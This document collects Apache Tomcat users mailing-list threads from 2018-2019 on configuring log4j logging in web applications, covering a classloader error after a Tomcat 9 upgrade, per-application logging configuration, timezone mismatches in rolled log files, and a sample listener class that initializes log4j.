> log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is not
> assignable to a "org.apache.log4j.Appender" variable.
> log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
> log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas object of
> type
> log4j:ERROR "org.apache.log4j.DailyRollingFileAppender" was loaded by
> [ParallelWebappClassLoader
> 
> aj
> 


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

log4j failed on tomcat9

[AJ Chen]

I use eclipse to develop web app for tomcat, Web app has a dependent
project and so the dependent project and all jars are added on the
classpath for tomcat runtime. Log4j works on tomcat 6. But after upgrate to
tomcat 9, log4j failed to start with the following error. Anyone has seen
similar problem? log4j2 also failed. Thanks.

log4j:ERROR A "org.apache.log4j.DailyRollingFileAppender" object is not
assignable to a "org.apache.log4j.Appender" variable.
log4j:ERROR The class "org.apache.log4j.Appender" was loaded by
log4j:ERROR [sun.misc.Launcher$AppClassLoader@18b4aac2] whereas object of
type
log4j:ERROR "org.apache.log4j.DailyRollingFileAppender" was loaded by
[ParallelWebappClassLoader

aj

AW: AW: Logging web applications with log4j 1.2

[Thomas Rohde]

Hi Chris,

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
> 
> Thomas,
> 
> On 2/21/19 07:20, Thomas Rohde wrote:
> > Hi Chris,
> > 
> > -Ursprüngliche Nachricht- Von: Christopher Schultz 
> > [mailto:ch...@christopherschultz.net] Gesendet: Mittwoch, 20.
> > Februar 2019 16:41 An: users@tomcat.apache.org Betreff: Re: Logging 
> > web applications with log4j 1.2
> > 
> >>> -BEGIN PGP SIGNED MESSAGE- Hash: SHA256
> >>> 
> >>> Thomas,
> >>> 
> >>> On 2/20/19 08:00, Thomas Rohde wrote:
> >>>> I've some basic questions regarding the usage of log4j 1.2 in 
> >>>> Tomcat 8.5.
> >>>> 
> >>>> We are running more than one web application in Tomcat. Each  
> >>>> application uses log4j via slf4j and ships the log4j.jar in
> >>>> 
> >>> WEB-INF/lib. The Tomcat itself uses JULI.
> >>> 
> >>> We are using a common log4j.xml file for configuration.
> >>> 
> >>> The file path is set as system property in CATALINA_OPTS as
> >>> follows: -Dlog4j.configuration=/path/to/file/log4j.xml
> >>> 
> >>> 1. Is this a valid setup or are there any side effects in 
> >>> initialization log4j by the different WebAppClassLoaders?
> >> 
> >> You are not using classpath-based config-file-loading, so it should 
> >> not be a problem[*].
> >> 
> >>> 2. We are observing weird things in rolling the files hourly.
> >>> The timestamp of the log messages doesn't fit to the timestamp 
> >>> suffix of the file. Why does this happen?
> >> 
> >> Possibly conflicting time zones, somewhere? Because log4j.jar is in 
> >> each application's class loader, they CAN have different in-memory 
> >> configurations.
> > No there are no different time zones in use.
> 
> That's what I figured. I've never see anything quite like you describe. I 
> could imagine that the JVM has one time zone but the shell is using another.
> 
> For example, if the JVM is convinced that the time zone is UTC but when you 
> are logged-into the server, your shell has TZ=America/Los_Angeles, then 
> you'll see a ~9 hour difference between file timestamps and the filenames. 
> Like this:
> 
> $ ls -l logs/
> 
> - -rw-r--r--   12345 Feb 19 16:01 log4j.log.2019-02-18
> - -rw-r--r--   12345 Feb 20 16:00 log4j.log.2019-02-19
> - -rw-r--r--   12345 Feb 21 16:01 log4j.log.2019-02-20
> 
> Note how each filename has the name you'd expect, but the timestamp looks a 
> little odd. If you look into each file, you'd see that e.g. in the 2019-02-19 
> file, the timestamps go from 2019-02-19T00:00:00 through 2019-02-19T23:59:59 
> but it looks like the file was rotated 8 hours earlier. That's because it was 
> rotated at 00:00 (PST) as reckoned by the JVM, but at 16:01 in UTC.
> 
> My recommendation would be to set all of your timezones to the same thing. 
> UTC makes the most sense to me, but that's just my opinion.
> Theoretically, all timestamps are interchangeable, right?

Thank you for the hint. We will check that!

> 
> >> [*] While this will work, why would you ever want multiple 
> >> applications to have their logging configuration all tied together? 
> >> Why not separate the logging configuration into one config-per web 
> >> application? OR are you trying to unify all logging into the same 
> >> file(s )?
> > Yes I would like to do that, but I'm not sure how to achieve it 
> > without putting the log4j.xml into the WAR file. Do you have any hint?
> I can think of several ways, but it depends upon how your application 
> initializes log4j.
> 
> If you specify where the configuration file is, directly, then you can either 
> change that to somewhere else, or you can replace that filename with a 
> parameter that you can set in web.xml -- say, in an . You *are* 
> configuring log4j in a ServletContextInitializer, right?
> 
> If you just do "new PropertyConfigurator()" (like I do), then it will search 
> the parent ClassLoader and that's it. In that case, you'll have to arrange 
> for the log4j.properties file to be present, there. Placing it in the WAR 
> file is an option. Another option would be to put the file elsewhere, but 
> then modify the Tomcat configuration to add another directory to the 
> ClassLoader, like this:
> 
> 
>   
>webAppMount="/"
> base="/path/to/app-specific-log-dir"
> className="org.apache.catalina.webresources.DirResourceSet&quo

Re: AW: Logging web applications with log4j 1.2

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Thomas,

On 2/21/19 07:20, Thomas Rohde wrote:
> Hi Chris,
> 
> -Ursprüngliche Nachricht- Von: Christopher Schultz
> [mailto:ch...@christopherschultz.net] Gesendet: Mittwoch, 20.
> Februar 2019 16:41 An: users@tomcat.apache.org Betreff: Re: Logging
> web applications with log4j 1.2
> 
>>> -BEGIN PGP SIGNED MESSAGE- Hash: SHA256
>>> 
>>> Thomas,
>>> 
>>> On 2/20/19 08:00, Thomas Rohde wrote:
>>>> I've some basic questions regarding the usage of log4j 1.2 in
>>>> Tomcat 8.5.
>>>> 
>>>> We are running more than one web application in Tomcat. Each
>>>>  application uses log4j via slf4j and ships the log4j.jar in
>>>> 
>>> WEB-INF/lib. The Tomcat itself uses JULI.
>>> 
>>> We are using a common log4j.xml file for configuration.
>>> 
>>> The file path is set as system property in CATALINA_OPTS as 
>>> follows: -Dlog4j.configuration=/path/to/file/log4j.xml
>>> 
>>> 1. Is this a valid setup or are there any side effects in 
>>> initialization log4j by the different WebAppClassLoaders?
>> 
>> You are not using classpath-based config-file-loading, so it
>> should not be a problem[*].
>> 
>>> 2. We are observing weird things in rolling the files hourly.
>>> The timestamp of the log messages doesn't fit to the timestamp
>>> suffix of the file. Why does this happen?
>> 
>> Possibly conflicting time zones, somewhere? Because log4j.jar is
>> in each application's class loader, they CAN have different
>> in-memory configurations.
> No there are no different time zones in use.

That's what I figured. I've never see anything quite like you
describe. I could imagine that the JVM has one time zone but the shell
is using another.

For example, if the JVM is convinced that the time zone is UTC but
when you are logged-into the server, your shell has
TZ=America/Los_Angeles, then you'll see a ~9 hour difference between
file timestamps and the filenames. Like this:

$ ls -l logs/

- -rw-r--r--   12345 Feb 19 16:01 log4j.log.2019-02-18
- -rw-r--r--   12345 Feb 20 16:00 log4j.log.2019-02-19
- -rw-r--r--   12345 Feb 21 16:01 log4j.log.2019-02-20

Note how each filename has the name you'd expect, but the timestamp
looks a little odd. If you look into each file, you'd see that e.g. in
the 2019-02-19 file, the timestamps go from 2019-02-19T00:00:00
through 2019-02-19T23:59:59 but it looks like the file was rotated 8
hours earlier. That's because it was rotated at 00:00 (PST) as
reckoned by the JVM, but at 16:01 in UTC.

My recommendation would be to set all of your timezones to the same
thing. UTC makes the most sense to me, but that's just my opinion.
Theoretically, all timestamps are interchangeable, right?

>> [*] While this will work, why would you ever want multiple 
>> applications to have their logging configuration all tied 
>> together? Why not separate the logging configuration into one 
>> config-per web application? OR are you trying to unify all
>> logging into the same file(s )?
> Yes I would like to do that, but I'm not sure how to achieve it 
> without putting the log4j.xml into the WAR file. Do you have any 
> hint?
I can think of several ways, but it depends upon how your application
initializes log4j.

If you specify where the configuration file is, directly, then you can
either change that to somewhere else, or you can replace that filename
with a parameter that you can set in web.xml -- say, in an
. You *are* configuring log4j in a
ServletContextInitializer, right?

If you just do "new PropertyConfigurator()" (like I do), then it will
search the parent ClassLoader and that's it. In that case, you'll have
to arrange for the log4j.properties file to be present, there. Placing
it in the WAR file is an option. Another option would be to put the
file elsewhere, but then modify the Tomcat configuration to add
another directory to the ClassLoader, like this:


  



Then you put your log4j.properties file in /path/to/app-specific-log-dir
.

Hope that helps,
- -chris
-BEGIN PGP SIGNATURE-
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/

iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlxuv/0ACgkQHPApP6U8
pFiiTA/+MesYHVHy1lHSzhxLylGC9q/vLXu2wykUQysUBh0GCbHqnftzytV5gKrd
GBwsPbbFSveGcn6VkhL/mJZJPsHAxGWB6pgoK4rYsjw1qVfUeDWr2XeC7AAVNFMC
0BXyS99u5CC0jlh+/Ps/SZMOZAby/hGfTuoFRD4VT6K3MmgtdAsbGVcci+ycLSLd
tOKWmxglu/0ylEc4fmxBDPygvmve/FD+elfSyqZ8VBri6UTlae++qcsnmBSeus8y
KqiHiZCWrZsn55FBhAsEJXQ1tvluxhpNYrcleEVXM/KZcH/g7eyNGdelFMJ4UVyk
cEM9dfWJdi74RJlZNN03CIWjJawI7IVZg0ghU/2C0ErwXlfjecA2vW0HZE2z/XtO
v+vJW2PXcM/pVef+Af5kf+f8wFGWeAaFVQhwQeSFEZQnG8Mfi8VaQifZd8X+ho9f
SshOywKZ4vDb2VmJrhg3aMwu9Q2BtggA+7fZ0n0/wJJJH

Re: Logging web applications with log4j 1.2

[John Dale]

1 - DevOps can alleviate this issue .. implicit in the model.
2 - exploded directory deployment would allow you to change log4j
assuming log4j is configured to reload its configuration on change

I'm not sure how classpath contexts are assigned to war files .. but
I'm sure there is way.  Anyone else have a suggestion?

On 2/21/19, Thomas Rohde  wrote:
> Hi Chris,
>
> -Ursprüngliche Nachricht-
> Von: Christopher Schultz [mailto:ch...@christopherschultz.net]
> Gesendet: Mittwoch, 20. Februar 2019 16:41
> An: users@tomcat.apache.org
> Betreff: Re: Logging web applications with log4j 1.2
>
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA256
>> >
>> > Thomas,
>> >
>> > On 2/20/19 08:00, Thomas Rohde wrote:
>> > > I've some basic questions regarding the usage of log4j 1.2 in Tomcat
>> > > 8.5.
>> > >
>> > > We are running more than one web application in Tomcat. Each
>> > > application uses log4j via slf4j and ships the log4j.jar in
>> > WEB-INF/lib. The Tomcat itself uses JULI.
>> >
>> > We are using a common log4j.xml file for configuration.
>> >
>> > The file path is set as system property in CATALINA_OPTS as
>> > follows: -Dlog4j.configuration=/path/to/file/log4j.xml
>> >
>> > 1. Is this a valid setup or are there any side effects in
>> > initialization log4j by the different WebAppClassLoaders?
>>
>> You are not using classpath-based config-file-loading, so it should not be
>> a problem[*].
>>
>> > 2. We are observing weird things in rolling the files hourly. The
>> > timestamp of the log messages doesn't fit to the timestamp suffix of
>> > the file. Why does this happen?
>>
>> Possibly conflicting time zones, somewhere? Because log4j.jar is in each
>> application's class loader, they CAN have different in-memory
>> configurations.
> No there are no different time zones in use.
>
>>
>> [*] While this will work, why would you ever want multiple applications to
>> have their logging configuration all tied together?
>> Why not separate the logging configuration into one config-per web
>> application? OR are you trying to unify all logging into the same file(s
>> )?
> Yes I would like to do that, but I'm not sure how to achieve it without
> putting the log4j.xml into the WAR file. Do you have any hint?
>
>>
>> - -chris
>> -BEGIN PGP SIGNATURE-
>> Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
>>
>> iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlxtdSUACgkQHPApP6U8
>> pFhxow//T+5ALVYJcljqLxykHND7ZSy9NHf0+a+jnWzlDO5S6oO+bxjso9raJZYC
>> jUG4nhBwuAtD5MWyS04t0UedYUBP+n1iw4aAGs7PrhFgPxLiHZpMOTBBaeDSYgny
>> bI+7GuqOhkiauPA8Jb6guE8SkrT18d9X+k7xzy6puYgqbTws0iwk2yEmSV+KNtXy
>> 0EsVC20KGhU9pCdD7MLSpYX8PaM8sctazxSSVMygL9Ed03WKkJ6BRPavq4ao1uGg
>> V0ZlTQb7f9PRPOXOQzoAlsaWNTCVRKQES82/HHJE/uJG5tg7jnQ5Syjs53FyfVwH
>> 0AtfNpJiOI4LES5ejR7E5JZ8Lx0/J41XwsPO5hOmYaiHHs35EFtozCETNNwjYxcb
>> 245z++YsBw0bnBDRpAFi5Kq5UL8ludo0CqDTfKQSIqrMoNHoiULm4U3niGl2P01w
>> O8k2KrwqtYWu77esh+TpJpXTTaLnEhCc+YWFGWnER3w8WAOHitvjbmAi21gL3NIG
>> 3PJEFEdrNMaoI2h3SkK+DJzuVVJRmXRMV2wduX4+3qGW6l31Jo3ihFiDDdXyGB+b
>> jtpU1JHYfYP+ck8mEXgOvI6RXZEG7R8Ef7ectYuKdhRRpE+S9wx1llZminsxY/fr
>> 0apA+L6paBo9R7EGxJVt237wx/L+tRnfF5raLZoAJrkks7SkWgE=
>> =sjai
>> -END PGP SIGNATURE-
>>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

AW: Logging web applications with log4j 1.2

[Thomas Rohde]

Hi Chris,

-Ursprüngliche Nachricht-
Von: Christopher Schultz [mailto:ch...@christopherschultz.net] 
Gesendet: Mittwoch, 20. Februar 2019 16:41
An: users@tomcat.apache.org
Betreff: Re: Logging web applications with log4j 1.2

> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA256
> > 
> > Thomas,
> > 
> > On 2/20/19 08:00, Thomas Rohde wrote:
> > > I've some basic questions regarding the usage of log4j 1.2 in Tomcat 
> > > 8.5.
> > > 
> > > We are running more than one web application in Tomcat. Each 
> > > application uses log4j via slf4j and ships the log4j.jar in 
> > WEB-INF/lib. The Tomcat itself uses JULI.
> > 
> > We are using a common log4j.xml file for configuration.
> > 
> > The file path is set as system property in CATALINA_OPTS as
> > follows: -Dlog4j.configuration=/path/to/file/log4j.xml
> > 
> > 1. Is this a valid setup or are there any side effects in 
> > initialization log4j by the different WebAppClassLoaders?
> 
> You are not using classpath-based config-file-loading, so it should not be a 
> problem[*].
> 
> > 2. We are observing weird things in rolling the files hourly. The 
> > timestamp of the log messages doesn't fit to the timestamp suffix of 
> > the file. Why does this happen?
> 
> Possibly conflicting time zones, somewhere? Because log4j.jar is in each 
> application's class loader, they CAN have different in-memory configurations.
No there are no different time zones in use.

> 
> [*] While this will work, why would you ever want multiple applications to 
> have their logging configuration all tied together?
> Why not separate the logging configuration into one config-per web 
> application? OR are you trying to unify all logging into the same file(s )?
Yes I would like to do that, but I'm not sure how to achieve it without putting 
the log4j.xml into the WAR file. Do you have any hint?

> 
> - -chris
> -BEGIN PGP SIGNATURE-
> Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
> 
> iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlxtdSUACgkQHPApP6U8
> pFhxow//T+5ALVYJcljqLxykHND7ZSy9NHf0+a+jnWzlDO5S6oO+bxjso9raJZYC
> jUG4nhBwuAtD5MWyS04t0UedYUBP+n1iw4aAGs7PrhFgPxLiHZpMOTBBaeDSYgny
> bI+7GuqOhkiauPA8Jb6guE8SkrT18d9X+k7xzy6puYgqbTws0iwk2yEmSV+KNtXy
> 0EsVC20KGhU9pCdD7MLSpYX8PaM8sctazxSSVMygL9Ed03WKkJ6BRPavq4ao1uGg
> V0ZlTQb7f9PRPOXOQzoAlsaWNTCVRKQES82/HHJE/uJG5tg7jnQ5Syjs53FyfVwH
> 0AtfNpJiOI4LES5ejR7E5JZ8Lx0/J41XwsPO5hOmYaiHHs35EFtozCETNNwjYxcb
> 245z++YsBw0bnBDRpAFi5Kq5UL8ludo0CqDTfKQSIqrMoNHoiULm4U3niGl2P01w
> O8k2KrwqtYWu77esh+TpJpXTTaLnEhCc+YWFGWnER3w8WAOHitvjbmAi21gL3NIG
> 3PJEFEdrNMaoI2h3SkK+DJzuVVJRmXRMV2wduX4+3qGW6l31Jo3ihFiDDdXyGB+b
> jtpU1JHYfYP+ck8mEXgOvI6RXZEG7R8Ef7ectYuKdhRRpE+S9wx1llZminsxY/fr
> 0apA+L6paBo9R7EGxJVt237wx/L+tRnfF5raLZoAJrkks7SkWgE=
> =sjai
> -END PGP SIGNATURE-
>
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org



-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Logging web applications with log4j 1.2

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Thomas,

On 2/20/19 08:00, Thomas Rohde wrote:
> I've some basic questions regarding the usage of log4j 1.2 in
> Tomcat 8.5.
> 
> We are running more than one web application in Tomcat. Each
> application uses log4j via slf4j and ships the log4j.jar in
> WEB-INF/lib. The Tomcat itself uses JULI.
> 
> We are using a common log4j.xml file for configuration.
> 
> The file path is set as system property in CATALINA_OPTS as
> follows: -Dlog4j.configuration=/path/to/file/log4j.xml
> 
> 1. Is this a valid setup or are there any side effects in
> initialization log4j by the different WebAppClassLoaders?

You are not using classpath-based config-file-loading, so it should
not be a problem[*].

> 2. We are observing weird things in rolling the files hourly. The
> timestamp of the log messages doesn't fit to the timestamp suffix
> of the file. Why does this happen?

Possibly conflicting time zones, somewhere? Because log4j.jar is in
each application's class loader, they CAN have different in-memory
configurations.

[*] While this will work, why would you ever want multiple
applications to have their logging configuration all tied together?
Why not separate the logging configuration into one config-per web
application? OR are you trying to unify all logging into the same file(s
)?

- -chris
-BEGIN PGP SIGNATURE-
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/

iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlxtdSUACgkQHPApP6U8
pFhxow//T+5ALVYJcljqLxykHND7ZSy9NHf0+a+jnWzlDO5S6oO+bxjso9raJZYC
jUG4nhBwuAtD5MWyS04t0UedYUBP+n1iw4aAGs7PrhFgPxLiHZpMOTBBaeDSYgny
bI+7GuqOhkiauPA8Jb6guE8SkrT18d9X+k7xzy6puYgqbTws0iwk2yEmSV+KNtXy
0EsVC20KGhU9pCdD7MLSpYX8PaM8sctazxSSVMygL9Ed03WKkJ6BRPavq4ao1uGg
V0ZlTQb7f9PRPOXOQzoAlsaWNTCVRKQES82/HHJE/uJG5tg7jnQ5Syjs53FyfVwH
0AtfNpJiOI4LES5ejR7E5JZ8Lx0/J41XwsPO5hOmYaiHHs35EFtozCETNNwjYxcb
245z++YsBw0bnBDRpAFi5Kq5UL8ludo0CqDTfKQSIqrMoNHoiULm4U3niGl2P01w
O8k2KrwqtYWu77esh+TpJpXTTaLnEhCc+YWFGWnER3w8WAOHitvjbmAi21gL3NIG
3PJEFEdrNMaoI2h3SkK+DJzuVVJRmXRMV2wduX4+3qGW6l31Jo3ihFiDDdXyGB+b
jtpU1JHYfYP+ck8mEXgOvI6RXZEG7R8Ef7ectYuKdhRRpE+S9wx1llZminsxY/fr
0apA+L6paBo9R7EGxJVt237wx/L+tRnfF5raLZoAJrkks7SkWgE=
=sjai
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Logging web applications with log4j 1.2

[John Dale]

I'm using 7.x still .. I put my log4j file in the classes folder of my web app.

On 2/20/19, Thomas Rohde  wrote:
> Hi!
>
> I've some basic questions regarding the usage of log4j 1.2 in Tomcat 8.5.
>
> We are running more than one web application in Tomcat. Each application
> uses log4j via slf4j and ships the log4j.jar in WEB-INF/lib. The Tomcat
> itself uses JULI.
>
> We are using a common log4j.xml file for configuration.
>
> The file path is set as system property in CATALINA_OPTS as follows:
> -Dlog4j.configuration=/path/to/file/log4j.xml
>
> 1. Is this a valid setup or are there any side effects in initialization
> log4j by the different WebAppClassLoaders?
>
> 2. We are observing weird things in rolling the files hourly. The timestamp
> of the log messages doesn't fit to the timestamp suffix of the file. Why
> does this happen?
>
> Regards,
> Thomas
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Logging web applications with log4j 1.2

[Thomas Rohde]

Hi!

I've some basic questions regarding the usage of log4j 1.2 in Tomcat 8.5.

We are running more than one web application in Tomcat. Each application uses 
log4j via slf4j and ships the log4j.jar in WEB-INF/lib. The Tomcat itself uses 
JULI.

We are using a common log4j.xml file for configuration.

The file path is set as system property in CATALINA_OPTS as follows:
-Dlog4j.configuration=/path/to/file/log4j.xml

1. Is this a valid setup or are there any side effects in initialization log4j 
by the different WebAppClassLoaders?

2. We are observing weird things in rolling the files hourly. The timestamp of 
the log messages doesn't fit to the timestamp suffix of the file. Why does this 
happen?

Regards,
Thomas



-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

On Thursday, December 27, 2018 5:35 PM, Mark H. Wood wrote:
>On Wed, Dec 19, 2018 at 06:52:20PM +, Lemke, Michael  ST/HZA-ZIC2 wrote:
>> On December 19, 2018 6:54 PM Lemke, Michael wrote:
>> >On December 18, 2018 8:52 PM Christopher Schultz wrote:
>> >>On 12/18/18 12:42, Lemke, Michael  ST/HZA-ZIC2 wrote:
>> >>> I have an old webapp that uses log4j 1.2 and which I am trying to 
>> >>> deploy on tomcat. For the heck of it I can't get tomcat to use the 
>> >>> log4.properties file. What am I doing wrong?
>> >>
>> >>
...
>> >I guess I have a terrible mess of all sorts of loggers in my libraries. I am
>> >not good at all the different Java loggers. The log4j.properties I want 
>> >to use is for log4j-1.2.27 so not quite bleeding edge ??. Then there are 
>> >other libs that pull in slf4j-api-1.7.25.jar, there is a 
>> >jcl-over-slf4j-1.7.25.jar, 
>> >logback-classic-1.2.3.jar, logback-core-1.2.3.jar.
>> >
>
>If this happens to be a project built with Maven then 'mvn
>dependency:tree' should tell you which artifacts are pulling in
>SLF4J.  You may need to run this more than once as you comb out
>transitive dependencies one by one.
>
>But it's possible to use multiple logging frameworks in one webapp. if
>you include/exclude the right artifacts.  See
>https://www.slf4j.org/legacy.html if you need to do this with SLF4J
>and Log4J v1.

Thank you very much, Mark, this was very helpful. With it I could clean up the 
mess. 
Most important part was to get rid of logback-* and switch everything to slf4j
with the help of slf4j-log4j12. Now everything seems to be working.

Thanks again,
Michael

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j app logging

[Mark H. Wood]

On Wed, Dec 19, 2018 at 06:52:20PM +, Lemke, Michael  ST/HZA-ZIC2 wrote:
> On December 19, 2018 6:54 PM Lemke, Michael wrote:
> >On December 18, 2018 8:52 PM Christopher Schultz wrote:
> >>On 12/18/18 12:42, Lemke, Michael  ST/HZA-ZIC2 wrote:
> >>> I have an old webapp that uses log4j 1.2 and which I am trying to 
> >>> deploy on tomcat. For the heck of it I can't get tomcat to use the 
> >>> log4.properties file. What am I doing wrong?
> >>
> >>
> >>How are you initializing log4j?
> >
> >Good question. I just dug a little and have to say I don't know. It
> >is a myfaces 1.1 application and I just realized jsf  has logging built
> >in somehow. I can't find any explicit call to Logger.getLogger in the 
> >code. 
> >
> >I guess I have a terrible mess of all sorts of loggers in my libraries. I am
> >not good at all the different Java loggers. The log4j.properties I want 
> >to use is for log4j-1.2.27 so not quite bleeding edge ??. Then there are 
> >other libs that pull in slf4j-api-1.7.25.jar, there is a 
> >jcl-over-slf4j-1.7.25.jar, 
> >logback-classic-1.2.3.jar, logback-core-1.2.3.jar.
> >
> >Well, I do get quite lot of logging from the app in the tomcat logfiles, so
> >something is working. But I don't know how to configure it.
> >
> >This used to work when I ran it on resin but I also changed quite a bit on
> >the code when I switched to tomcat. I'll try without all the new stuff.
> 
> And this was it. The old version without the stuff that pulls in all the other
> log libraries it works. So tomcat is out of the loop. Sorry for the noise.
> (But if someone has a hint on my mess I wouldn't mind.)

If this happens to be a project built with Maven then 'mvn
dependency:tree' should tell you which artifacts are pulling in
SLF4J.  You may need to run this more than once as you comb out
transitive dependencies one by one.

But it's possible to use multiple logging frameworks in one webapp. if
you include/exclude the right artifacts.  See
https://www.slf4j.org/legacy.html if you need to do this with SLF4J
and Log4J v1.

-- 
Mark H. Wood
Lead Technology Analyst

University Library
Indiana University - Purdue University Indianapolis
755 W. Michigan Street
Indianapolis, IN 46202
317-274-0749
www.ulib.iupui.edu


signature.asc
Description: PGP signature

RE: log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

On December 19, 2018 6:54 PM Lemke, Michael wrote:
>On December 18, 2018 8:52 PM Christopher Schultz wrote:
>>On 12/18/18 12:42, Lemke, Michael  ST/HZA-ZIC2 wrote:
>>> I have an old webapp that uses log4j 1.2 and which I am trying to 
>>> deploy on tomcat. For the heck of it I can't get tomcat to use the 
>>> log4.properties file. What am I doing wrong?
>>
>>
>>How are you initializing log4j?
>
>Good question. I just dug a little and have to say I don't know. It
>is a myfaces 1.1 application and I just realized jsf  has logging built
>in somehow. I can't find any explicit call to Logger.getLogger in the 
>code. 
>
>I guess I have a terrible mess of all sorts of loggers in my libraries. I am
>not good at all the different Java loggers. The log4j.properties I want 
>to use is for log4j-1.2.27 so not quite bleeding edge ??. Then there are 
>other libs that pull in slf4j-api-1.7.25.jar, there is a 
>jcl-over-slf4j-1.7.25.jar, 
>logback-classic-1.2.3.jar, logback-core-1.2.3.jar.
>
>Well, I do get quite lot of logging from the app in the tomcat logfiles, so
>something is working. But I don't know how to configure it.
>
>This used to work when I ran it on resin but I also changed quite a bit on
>the code when I switched to tomcat. I'll try without all the new stuff.

And this was it. The old version without the stuff that pulls in all the other
log libraries it works. So tomcat is out of the loop. Sorry for the noise.
(But if someone has a hint on my mess I wouldn't mind.)

Thanks,
Michael

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

Christopher,

On December 18, 2018 8:52 PM Christopher Schultz wrote:
>On 12/18/18 12:42, Lemke, Michael  ST/HZA-ZIC2 wrote:
>> I have an old webapp that uses log4j 1.2 and which I am trying to 
>> deploy on tomcat. For the heck of it I can't get tomcat to use the 
>> log4.properties file. What am I doing wrong?
>
>Are you trying to get Tomcat to use the log4j.properties file from
>your application? 

No, this is not what I want to do.

>If so, that's not going to work, because Tomcagt
>starts up long before your application is loaded, and so the log4j.jar
>file and log4j.properties file are not used at all.
>
>Your *application* should be able to use log4j without any problems as
>long as the log4j.jar file is in WEB-INB/lib and your log4j.properties
>file is in (usually) WEB-INF/classes/log4j.properties.

Right, I want my application to use its log4j.properties.

>
>> tomcat 9.0.6 is installed as a Windows service and does serve my 
>> webapp, so the app is working fine. The project is mavenized, I
>> put log4.properties to src/main/resources and it ends up in the jar
>> file of my application. Is there anything special that needs to be
>> done?
>
>How are you initializing log4j?

Good question. I just dug a little and have to say I don't know. It
is a myfaces 1.1 application and I just realized jsf  has logging built
in somehow. I can't find any explicit call to Logger.getLogger in the 
code. 

I guess I have a terrible mess of all sorts of loggers in my libraries. I am
not good at all the different Java loggers. The log4j.properties I want 
to use is for log4j-1.2.27 so not quite bleeding edge . Then there are 
other libs that pull in slf4j-api-1.7.25.jar, there is a 
jcl-over-slf4j-1.7.25.jar, 
logback-classic-1.2.3.jar, logback-core-1.2.3.jar.

Well, I do get quite lot of logging from the app in the tomcat logfiles, so
something is working. But I don't know how to configure it.

This used to work when I ran it on resin but I also changed quite a bit on
the code when I switched to tomcat. I'll try without all the new stuff.

Thanks,
Michael

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j app logging

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Michael,

On 12/18/18 13:53, Lemke, Michael  ST/HZA-ZIC2 wrote:
> Thanks, Ryan, this JULI thing actually is what worries me. I don't
> care about tomcat's logging at the moment. It is my webapp's
> logging I can't figure out. It worked on other containers.

Oh, good: you are trying just to manage your own application's logging.

I have this class running as a ServletContextListener:

package xxx;

import javax.servlet.ServletContextListener;
import javax.servlet.ServletContextEvent;

import org.apache.log4j.PropertyConfigurator;
import org.apache.log4j.Logger;
import org.apache.log4j.LogManager;

/**
 * A listener to initialize log4j.
 *
 * @author Chris Schultz
 * @version $Revision: 17834 $ $Date: 2015-12-16 11:03:13 -0500 (Wed,
16 Dec 2015) $
 */
public class Log4jListener
implements ServletContextListener
{
private Logger logger;

@SuppressWarnings("unused")
public void contextInitialized(ServletContextEvent e)
{
// Trigger loading of the log4j.properties file from the
classpath.
new PropertyConfigurator();

logger = Logger.getLogger(this.getClass());

    logger.info("Log4j initialized");
}

public void contextDestroyed(ServletContextEvent e)
{
if(LogManager.class.getClassLoader()
   .equals(this.getClass().getClassLoader()))
{
if(null != logger)
    logger.info("Log4j was loaded by application
classloader; shutting down.");

LogManager.shutdown();
}
else
{
if(null != logger)
logger.info("Log4j was loaded by some other
ClassLoader; not shutting down.");
}
}
}

Calling the PropertyConfigurator constructor causes that class to look
for log4j.properties in various places, including (due to the way the
WebappClassLoader works), WEB-INF/classes. It should also look in the
"top-level" of any application JAR files that are in WEB-INF/lib.

You said that "your JAR file contains log4j.properties". Usually
applications are packaged as WAR files (or exploded WAR directories).
